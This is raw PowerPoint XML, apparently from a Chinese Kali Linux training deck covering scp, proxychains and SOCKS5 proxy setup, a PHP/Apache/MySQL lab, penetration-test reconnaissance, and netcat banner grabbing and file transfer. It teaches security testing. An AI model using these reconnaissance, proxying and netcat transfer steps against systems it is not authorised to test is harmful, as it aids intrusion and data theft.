                <a:gd name="T19" fmla="*/ 164 h 200"/>
                <a:gd name="T20" fmla="*/ 128 w 156"/>
                <a:gd name="T21" fmla="*/ 152 h 200"/>
                <a:gd name="T22" fmla="*/ 116 w 156"/>
                <a:gd name="T23" fmla="*/ 164 h 200"/>
                <a:gd name="T24" fmla="*/ 128 w 156"/>
                <a:gd name="T25" fmla="*/ 148 h 200"/>
                <a:gd name="T26" fmla="*/ 116 w 156"/>
                <a:gd name="T27" fmla="*/ 136 h 200"/>
                <a:gd name="T28" fmla="*/ 116 w 156"/>
                <a:gd name="T29" fmla="*/ 132 h 200"/>
                <a:gd name="T30" fmla="*/ 128 w 156"/>
                <a:gd name="T31" fmla="*/ 120 h 200"/>
                <a:gd name="T32" fmla="*/ 116 w 156"/>
                <a:gd name="T33" fmla="*/ 132 h 200"/>
                <a:gd name="T34" fmla="*/ 112 w 156"/>
                <a:gd name="T35" fmla="*/ 180 h 200"/>
                <a:gd name="T36" fmla="*/ 100 w 156"/>
                <a:gd name="T37" fmla="*/ 168 h 200"/>
                <a:gd name="T38" fmla="*/ 100 w 156"/>
                <a:gd name="T39" fmla="*/ 164 h 200"/>
                <a:gd name="T40" fmla="*/ 112 w 156"/>
                <a:gd name="T41" fmla="*/ 152 h 200"/>
                <a:gd name="T42" fmla="*/ 100 w 156"/>
                <a:gd name="T43" fmla="*/ 164 h 200"/>
                <a:gd name="T44" fmla="*/ 112 w 156"/>
                <a:gd name="T45" fmla="*/ 148 h 200"/>
                <a:gd name="T46" fmla="*/ 100 w 156"/>
                <a:gd name="T47" fmla="*/ 136 h 200"/>
                <a:gd name="T48" fmla="*/ 100 w 156"/>
                <a:gd name="T49" fmla="*/ 132 h 200"/>
                <a:gd name="T50" fmla="*/ 112 w 156"/>
                <a:gd name="T51" fmla="*/ 120 h 200"/>
                <a:gd name="T52" fmla="*/ 100 w 156"/>
                <a:gd name="T53" fmla="*/ 132 h 200"/>
                <a:gd name="T54" fmla="*/ 96 w 156"/>
                <a:gd name="T55" fmla="*/ 180 h 200"/>
                <a:gd name="T56" fmla="*/ 84 w 156"/>
                <a:gd name="T57" fmla="*/ 168 h 200"/>
                <a:gd name="T58" fmla="*/ 84 w 156"/>
                <a:gd name="T59" fmla="*/ 164 h 200"/>
                <a:gd name="T60" fmla="*/ 96 w 156"/>
                <a:gd name="T61" fmla="*/ 152 h 200"/>
                <a:gd name="T62" fmla="*/ 84 w 156"/>
                <a:gd name="T63" fmla="*/ 164 h 200"/>
                <a:gd name="T64" fmla="*/ 96 w 156"/>
                <a:gd name="T65" fmla="*/ 148 h 200"/>
                <a:gd name="T66" fmla="*/ 84 w 156"/>
                <a:gd name="T67" fmla="*/ 136 h 200"/>
                <a:gd name="T68" fmla="*/ 84 w 156"/>
                <a:gd name="T69" fmla="*/ 132 h 200"/>
                <a:gd name="T70" fmla="*/ 96 w 156"/>
                <a:gd name="T71" fmla="*/ 120 h 200"/>
                <a:gd name="T72" fmla="*/ 84 w 156"/>
                <a:gd name="T73" fmla="*/ 132 h 200"/>
                <a:gd name="T74" fmla="*/ 137 w 156"/>
                <a:gd name="T75" fmla="*/ 35 h 200"/>
                <a:gd name="T76" fmla="*/ 76 w 156"/>
                <a:gd name="T77" fmla="*/ 42 h 200"/>
                <a:gd name="T78" fmla="*/ 82 w 156"/>
                <a:gd name="T79" fmla="*/ 76 h 200"/>
                <a:gd name="T80" fmla="*/ 144 w 156"/>
                <a:gd name="T81" fmla="*/ 69 h 200"/>
                <a:gd name="T82" fmla="*/ 144 w 156"/>
                <a:gd name="T83" fmla="*/ 120 h 200"/>
                <a:gd name="T84" fmla="*/ 132 w 156"/>
                <a:gd name="T85" fmla="*/ 132 h 200"/>
                <a:gd name="T86" fmla="*/ 144 w 156"/>
                <a:gd name="T87" fmla="*/ 120 h 200"/>
                <a:gd name="T88" fmla="*/ 132 w 156"/>
                <a:gd name="T89" fmla="*/ 136 h 200"/>
                <a:gd name="T90" fmla="*/ 144 w 156"/>
                <a:gd name="T91" fmla="*/ 148 h 200"/>
                <a:gd name="T92" fmla="*/ 144 w 156"/>
                <a:gd name="T93" fmla="*/ 152 h 200"/>
                <a:gd name="T94" fmla="*/ 132 w 156"/>
                <a:gd name="T95" fmla="*/ 164 h 200"/>
                <a:gd name="T96" fmla="*/ 144 w 156"/>
                <a:gd name="T97" fmla="*/ 152 h 200"/>
                <a:gd name="T98" fmla="*/ 132 w 156"/>
                <a:gd name="T99" fmla="*/ 168 h 200"/>
                <a:gd name="T100" fmla="*/ 144 w 156"/>
                <a:gd name="T101" fmla="*/ 180 h 200"/>
                <a:gd name="T102" fmla="*/ 50 w 156"/>
                <a:gd name="T103" fmla="*/ 180 h 200"/>
                <a:gd name="T104" fmla="*/ 20 w 156"/>
                <a:gd name="T105" fmla="*/ 173 h 200"/>
                <a:gd name="T106" fmla="*/ 26 w 156"/>
                <a:gd name="T107" fmla="*/ 12 h 200"/>
                <a:gd name="T108" fmla="*/ 36 w 156"/>
                <a:gd name="T109" fmla="*/ 0 h 200"/>
                <a:gd name="T110" fmla="*/ 44 w 156"/>
                <a:gd name="T111" fmla="*/ 12 h 200"/>
                <a:gd name="T112" fmla="*/ 56 w 156"/>
                <a:gd name="T113" fmla="*/ 18 h 200"/>
                <a:gd name="T114" fmla="*/ 50 w 156"/>
                <a:gd name="T115" fmla="*/ 18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6" h="200">
                  <a:moveTo>
                    <a:pt x="144" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="200"/>
                    <a:pt x="12" y="200"/>
                    <a:pt x="12" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="200"/>
                    <a:pt x="0" y="194"/>
                    <a:pt x="0" y="18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0"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="12" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="175"/>
                    <a:pt x="12" y="175"/>
                    <a:pt x="12" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="182"/>
                    <a:pt x="18" y="187"/>
                    <a:pt x="25" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="187"/>
                    <a:pt x="50" y="187"/>
                    <a:pt x="50" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="187"/>
                    <a:pt x="64" y="182"/>
                    <a:pt x="64" y="175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1" y="24"/>
                    <a:pt x="156" y="30"/>
                    <a:pt x="156" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="187"/>
                    <a:pt x="156" y="187"/>
                    <a:pt x="156" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="194"/>
                    <a:pt x="151" y="200"/>
                    <a:pt x="144" y="200"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="180"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="180"/>
                    <a:pt x="128" y="180"/>
                    <a:pt x="128" y="180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16" y="168"/>
                    <a:pt x="116" y="168"/>
                    <a:pt x="116" y="168"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="180"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="164"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="164"/>
                    <a:pt x="128" y="164"/>
                    <a:pt x="128" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="152"/>
                    <a:pt x="128" y="152"/>
                    <a:pt x="128" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="152"/>
                    <a:pt x="116" y="152"/>
                    <a:pt x="116" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="164"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="148"/>
                    <a:pt x="128" y="148"/>
                    <a:pt x="128" y="148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16" y="136"/>
                    <a:pt x="116" y="136"/>
                    <a:pt x="116" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="132"/>
                    <a:pt x="128" y="132"/>
                    <a:pt x="128" y="132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16" y="120"/>
                    <a:pt x="116" y="120"/>
                    <a:pt x="116" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="132"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="180"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="180"/>
                    <a:pt x="112" y="180"/>
                    <a:pt x="112" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="168"/>
                    <a:pt x="112" y="168"/>
                    <a:pt x="112" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="168"/>
                    <a:pt x="100" y="168"/>
                    <a:pt x="100" y="168"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="180"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="164"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="164"/>
                    <a:pt x="112" y="164"/>
                    <a:pt x="112" y="164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00" y="152"/>
                    <a:pt x="100" y="152"/>
                    <a:pt x="100" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="164"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="148"/>
                    <a:pt x="112" y="148"/>
                    <a:pt x="112" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="136"/>
                    <a:pt x="112" y="136"/>
                    <a:pt x="112" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="136"/>
                    <a:pt x="100" y="136"/>
                    <a:pt x="100" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="132"/>
                    <a:pt x="112" y="132"/>
                    <a:pt x="112" y="132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00" y="120"/>
                    <a:pt x="100" y="120"/>
                    <a:pt x="100" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="132"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="84" y="180"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="180"/>
                    <a:pt x="96" y="180"/>
                    <a:pt x="96" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="168"/>
                    <a:pt x="96" y="168"/>
                    <a:pt x="96" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="168"/>
                    <a:pt x="84" y="168"/>
                    <a:pt x="84" y="168"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="180"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="84" y="164"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="164"/>
                    <a:pt x="96" y="164"/>
                    <a:pt x="96" y="164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84" y="152"/>
                    <a:pt x="84" y="152"/>
                    <a:pt x="84" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="164"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="84" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="148"/>
                    <a:pt x="96" y="148"/>
                    <a:pt x="96" y="148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84" y="136"/>
                    <a:pt x="84" y="136"/>
                    <a:pt x="84" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="84" y="132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84" y="120"/>
                    <a:pt x="84" y="120"/>
                    <a:pt x="84" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="132"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="144" y="42"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="38"/>
                    <a:pt x="141" y="35"/>
                    <a:pt x="137" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="35"/>
                    <a:pt x="82" y="35"/>
                    <a:pt x="82" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="35"/>
                    <a:pt x="76" y="38"/>
                    <a:pt x="76" y="42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73"/>
                    <a:pt x="78" y="76"/>
                    <a:pt x="82" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="76"/>
                    <a:pt x="137" y="76"/>
                    <a:pt x="137" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="76"/>
                    <a:pt x="144" y="73"/>
                    <a:pt x="144" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="42"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="144" y="120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="120"/>
                    <a:pt x="132" y="120"/>
                    <a:pt x="132" y="120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44" y="132"/>
                    <a:pt x="144" y="132"/>
                    <a:pt x="144" y="132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="120"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="144" y="136"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="136"/>
                    <a:pt x="132" y="136"/>
                    <a:pt x="132" y="136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44" y="148"/>
                    <a:pt x="144" y="148"/>
                    <a:pt x="144" y="148"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="136"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="144" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="152"/>
                    <a:pt x="132" y="152"/>
                    <a:pt x="132" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="164"/>
                    <a:pt x="132" y="164"/>
                    <a:pt x="132" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="164"/>
                    <a:pt x="144" y="164"/>
                    <a:pt x="144" y="164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="152"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="144" y="168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44" y="180"/>
                    <a:pt x="144" y="180"/>
                    <a:pt x="144" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="168"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50" y="180"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="180"/>
                    <a:pt x="26" y="180"/>
                    <a:pt x="26" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="180"/>
                    <a:pt x="20" y="177"/>
                    <a:pt x="20" y="173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5"/>
                    <a:pt x="22" y="12"/>
                    <a:pt x="2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3" y="12"/>
                    <a:pt x="56" y="15"/>
                    <a:pt x="56" y="18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77"/>
                    <a:pt x="53" y="180"/>
                    <a:pt x="50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236240" y="2496383"/>
            <a:ext cx="5940872" cy="655784"/>
          </a:xfrm>
          <a:noFill/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结束语</a:t>
            </a:r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3478678" y="3564045"/>
            <a:ext cx="3183470" cy="310871"/>
          </a:xfr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公司或署名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/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3478678" y="3879679"/>
            <a:ext cx="3183470" cy="310871"/>
          </a:xfr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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版权信息或网址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515100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2017/10/22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515100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www.islide.cc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>「 让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设计简单起来！」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515100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직사각형 45">
            <a:extLst/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="1028700"/>
            <a:ext cx="10825163" cy="8767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08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hux.com/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testurl/door.php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1245BD35-E942-4E52-A1E8-DD853B4E8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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Andalus" panose="02020603050405020304" pitchFamily="18" charset="-78"/>
                <a:sym typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Andalus" panose="02020603050405020304" pitchFamily="18" charset="-78"/>
                <a:sym typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>daiya</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Andalus" panose="02020603050405020304" pitchFamily="18" charset="-78"/>
              <a:sym typeface="+mn-lt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4A11B491-709E-4EBD-AE08-49D831A5B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Kali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基础与网络讲解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C08B2A3-013F-40A4-9B8B-C07BF732FD80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6698742" y="1615719"/>
            <a:ext cx="3162564" cy="1146358"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40248"/>
              <a:gd name="adj2" fmla="val 78959"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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4AE9A11-1B95-4C85-B0FF-5E8C8FB4731D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836322" y="1923141"/>
            <a:ext cx="2896963" cy="531514"/>
            <a:chOff x="416689" y="1415353"/>
            <a:chExt cx="5537071" cy="1015903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94AF91E3-6902-44BC-BD44-68D32BE917DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2681971" y="1720016"/>
              <a:ext cx="3271789" cy="711240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16600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+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>October</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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D9446382-2F9A-4F71-AEB3-0929F73E2C43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="416689" y="1415353"/>
              <a:ext cx="2125322" cy="1015901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  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>23th</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="96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13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scp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10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24680" y="1227236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实例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504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scp -r 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local_folder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 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remote_username@remote_ip:remote_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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实例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1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：从远处复制文件到本地目录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scp root@10.6.159.147:/opt/soft/demo.tar /opt/soft/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实例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3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：上传本地文件到远程机器指定目录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scp /opt/soft/demo.tar root@10.6.159.147:/opt/soft/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scptest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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实例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4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：上传本地目录到远程机器指定目录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scp -r /opt/soft/test root@10.6.159.147:/opt/soft/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scptest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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641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代理服务器安装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11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96" y="1415552"/>
            <a:ext cx="8401016" cy="25117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4101" y="44665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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>proxychains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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vim  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/proxychains.conf </a:t>
            </a:r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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>socks5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>代理，需要安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr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239186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Socks5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服务器搭建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12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7629" y="1469132"/>
            <a:ext cx="6096000" cy="43858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安装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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-server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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>配置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mv /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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danted.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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danted.conf.bak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touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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danted.conf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nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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danted.conf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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>启动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etc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init.d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danted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> start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检查服务是否正常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77" y="1319164"/>
            <a:ext cx="3444539" cy="46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7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Kali web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环境创建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13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9924" y="1463576"/>
            <a:ext cx="6803895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安装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PHP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环境，命令如下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apt-get install php5 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php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-pear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现在启动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SSH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、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Apache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以及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MySQL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这些服务，手动启动命令如下：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service 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sshd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 start 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或 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/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etc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/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init.d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/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ssh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 start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service apache2 start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service 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mysql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 start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734642" y="4622275"/>
            <a:ext cx="6096000" cy="879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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目录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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/www/html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116043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信息收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="320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3200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b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97450" y="3173037"/>
            <a:ext cx="6523037" cy="2970587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渗透测试最重要的阶段之一就是信息收集。为了启动渗透测试，用户需要收集关于目标主机的基本信息。用户得到的信息越多，渗透测试成功的概率也就越高。枚举服务；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测试网络范围；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识别活跃的主机和查看打开的端口；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系统指纹识别；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服务指纹识别；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其他信息收集手段；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 err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>收集信息；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绘制网络图。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8615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Kali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netcat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15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7270" y="1309993"/>
            <a:ext cx="9044477" cy="5334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Nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>banner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dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc –v 192.168.100.108 80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文件传输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nc -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
